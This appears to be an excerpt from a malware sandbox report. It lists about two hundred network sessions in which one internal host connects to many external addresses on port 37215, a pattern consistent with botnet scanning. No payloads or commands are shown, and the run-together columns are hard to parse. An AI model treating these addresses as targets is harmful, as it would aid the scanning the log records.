                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4547192.168.2.1343826157.25.20.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4548192.168.2.13460982.180.55.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4549192.168.2.133653641.190.188.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4550192.168.2.133993241.227.25.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4551192.168.2.134268278.85.62.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4552192.168.2.133722441.120.164.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4553192.168.2.1346690157.153.251.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4554192.168.2.133472441.50.186.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4555192.168.2.135910441.88.174.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4556192.168.2.1349684197.250.169.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4557192.168.2.1337374157.32.67.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4558192.168.2.133444441.134.128.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4559192.168.2.134883841.236.247.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4560192.168.2.1333856197.188.11.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4561192.168.2.1345868157.9.253.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4562192.168.2.1356892112.254.197.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4563192.168.2.1357960157.199.215.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4564192.168.2.1359852166.85.250.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4565192.168.2.133967224.161.78.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4566192.168.2.1337408197.92.41.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4567192.168.2.136073641.144.209.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4568192.168.2.1333842183.46.227.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4569192.168.2.134684241.253.72.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4570192.168.2.1360250157.82.0.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4571192.168.2.135364841.135.71.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4572192.168.2.1350218130.96.141.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4573192.168.2.133373298.198.63.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4574192.168.2.1334808197.36.90.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4575192.168.2.134941678.122.68.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4576192.168.2.1337668197.220.201.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4577192.168.2.135047241.44.124.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4578192.168.2.1346288104.67.124.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4579192.168.2.1338574157.139.129.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4580192.168.2.133718441.76.87.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4581192.168.2.135127877.190.129.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4582192.168.2.1343446157.86.118.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4583192.168.2.135260025.125.208.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4584192.168.2.1354432157.255.159.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4585192.168.2.1334534197.12.212.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4586192.168.2.1349540157.168.9.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4587192.168.2.135326241.108.168.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4588192.168.2.1338874179.162.158.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4589192.168.2.1357396197.215.117.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4590192.168.2.1343514157.43.184.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4591192.168.2.134714241.148.31.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4592192.168.2.1356614197.64.68.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4593192.168.2.1337826197.89.3.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4594192.168.2.134327283.66.140.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4595192.168.2.1359806197.211.66.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4596192.168.2.135543667.169.187.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4597192.168.2.135034441.48.175.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4598192.168.2.135614641.21.170.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4599192.168.2.1335990197.53.110.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4600192.168.2.1336504197.7.161.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4601192.168.2.1346472197.11.235.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4602192.168.2.1338404121.249.137.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4603192.168.2.1340446136.168.186.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4604192.168.2.1350698157.161.161.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4605192.168.2.134206641.189.127.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4606192.168.2.134174635.220.169.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4607192.168.2.1346388157.252.151.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4608192.168.2.1351814197.227.135.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4609192.168.2.1351594197.188.117.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4610192.168.2.1338252197.159.25.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4611192.168.2.134681027.160.190.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4612192.168.2.1352042157.44.242.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4613192.168.2.1353006197.13.127.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4614192.168.2.1346928157.151.43.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4615192.168.2.1357842157.140.159.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4616192.168.2.1352434197.106.97.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4617192.168.2.1340792157.111.167.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4618192.168.2.1355122197.106.28.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4619192.168.2.1333310197.69.248.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4620192.168.2.134644041.125.119.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4621192.168.2.1335566197.155.140.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4622192.168.2.1350612197.78.188.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4623192.168.2.1338990157.217.165.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4624192.168.2.134640297.66.243.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4625192.168.2.1353050157.6.15.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4626192.168.2.1357208197.209.68.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4627192.168.2.1354268157.134.177.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4628192.168.2.1359136204.23.31.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4629192.168.2.1357456197.188.15.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4630192.168.2.134828641.51.252.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4631192.168.2.134385869.29.177.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4632192.168.2.1352970197.154.160.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4633192.168.2.1348458206.248.129.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4634192.168.2.134049441.76.214.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4635192.168.2.1340812197.148.81.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4636192.168.2.1347106197.41.238.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4637192.168.2.133759641.48.174.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4638192.168.2.1350946197.129.99.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4639192.168.2.1344394197.234.242.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4640192.168.2.1352002197.84.64.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4641192.168.2.1340084197.83.32.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4642192.168.2.1343374205.163.207.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4643192.168.2.133715441.205.26.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4644192.168.2.1338706197.229.230.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4645192.168.2.1351596157.110.148.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4646192.168.2.133509641.33.17.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4647192.168.2.1341642157.245.91.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4648192.168.2.133980841.21.83.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4649192.168.2.135895641.111.45.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4650192.168.2.1360932197.115.237.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4651192.168.2.1342232216.45.51.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4652192.168.2.1346716154.194.28.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4653192.168.2.135994841.114.83.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4654192.168.2.1344104139.234.50.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4655192.168.2.1340540157.50.158.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4656192.168.2.1350848146.83.48.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4657192.168.2.1344276197.61.116.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4658192.168.2.1335766154.122.184.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4659192.168.2.1355298157.81.227.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4660192.168.2.135570841.49.57.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4661192.168.2.133941241.197.39.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4662192.168.2.135721841.133.123.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4663192.168.2.1351122102.118.117.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4664192.168.2.133345689.165.11.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4665192.168.2.1342002157.89.217.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4666192.168.2.1344716197.198.160.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4667192.168.2.1337674157.4.160.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4668192.168.2.1335134197.77.244.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4669192.168.2.1339902197.115.106.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4670192.168.2.13509584.75.188.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4671192.168.2.1360162157.197.171.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4672192.168.2.1359816197.208.181.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4673192.168.2.133654841.99.193.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4674192.168.2.1342236223.111.244.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4675192.168.2.1344348157.169.241.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4676192.168.2.1352856157.60.17.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4677192.168.2.136039441.128.119.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4678192.168.2.1339958157.109.86.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4679192.168.2.1353974197.85.176.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4680192.168.2.133713641.247.244.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4681192.168.2.1345784197.217.38.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4682192.168.2.134472841.144.201.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4683192.168.2.1348408157.65.124.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4684192.168.2.1335300157.223.229.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4685192.168.2.134539641.181.202.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4686192.168.2.1351112157.56.246.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4687192.168.2.1344446109.155.101.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4688192.168.2.135185057.136.193.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4689192.168.2.1338398157.74.129.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4690192.168.2.133318865.236.35.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4691192.168.2.1338660157.218.48.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4692192.168.2.1340406157.15.154.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4693192.168.2.136077267.234.42.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4694192.168.2.135064841.4.251.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4695192.168.2.1342660197.48.15.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4696192.168.2.133824418.84.75.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4697192.168.2.135132841.201.9.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4698192.168.2.1343594197.137.92.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4699192.168.2.1334534197.151.48.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4700192.168.2.1349972197.107.82.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4701192.168.2.135776841.180.139.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4702192.168.2.1345578157.215.208.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4703192.168.2.1351948157.194.118.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4704192.168.2.133751261.0.187.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4705192.168.2.1345892157.29.148.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4706192.168.2.1360518157.1.255.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4707192.168.2.135025841.11.218.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4708192.168.2.133289899.56.28.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4709192.168.2.135403841.85.248.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4710192.168.2.1344076197.199.173.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4711192.168.2.134303641.86.180.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4712192.168.2.135841872.102.74.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4713192.168.2.1350096157.159.120.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4714192.168.2.1359096197.250.99.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4715192.168.2.1355306197.168.164.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4716192.168.2.135751266.93.64.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4717192.168.2.1343800197.106.236.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4718192.168.2.1348282197.227.236.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4719192.168.2.135151441.243.251.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4720192.168.2.1348198157.148.61.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4721192.168.2.1338000197.244.241.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4722192.168.2.1335826197.240.235.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4723192.168.2.1333714197.232.202.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4724192.168.2.134640441.245.62.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4725192.168.2.135738041.81.167.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4726192.168.2.1350054157.165.224.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4727192.168.2.1346276197.24.23.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4728192.168.2.1340274157.33.66.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4729192.168.2.1333822124.72.96.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4730192.168.2.1359788196.251.212.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4731192.168.2.134757241.87.191.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4732192.168.2.134805041.177.216.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4733192.168.2.1341864157.110.30.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4734192.168.2.135156641.68.74.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4735192.168.2.134834441.50.80.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4736192.168.2.1360570160.5.103.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4737192.168.2.133723841.77.69.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4738192.168.2.1351926197.128.116.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4739192.168.2.1352878197.30.203.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4740192.168.2.1338682197.162.140.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4741192.168.2.1337838197.138.70.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4742192.168.2.134584241.185.10.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4743192.168.2.1346382157.157.249.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4744192.168.2.134957082.43.4.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4745192.168.2.135616041.87.137.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4746192.168.2.134608870.151.3.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4747192.168.2.1333908157.28.157.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4748192.168.2.134346641.246.174.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4749192.168.2.1357064157.140.251.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4750192.168.2.1360790157.188.107.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4751192.168.2.1338940197.115.221.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4752192.168.2.1348626197.2.135.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4753192.168.2.1353578197.59.240.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4754192.168.2.134290240.213.172.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4755192.168.2.135487673.45.212.5237215
                                                  TimestampBytes transferredDirectionData


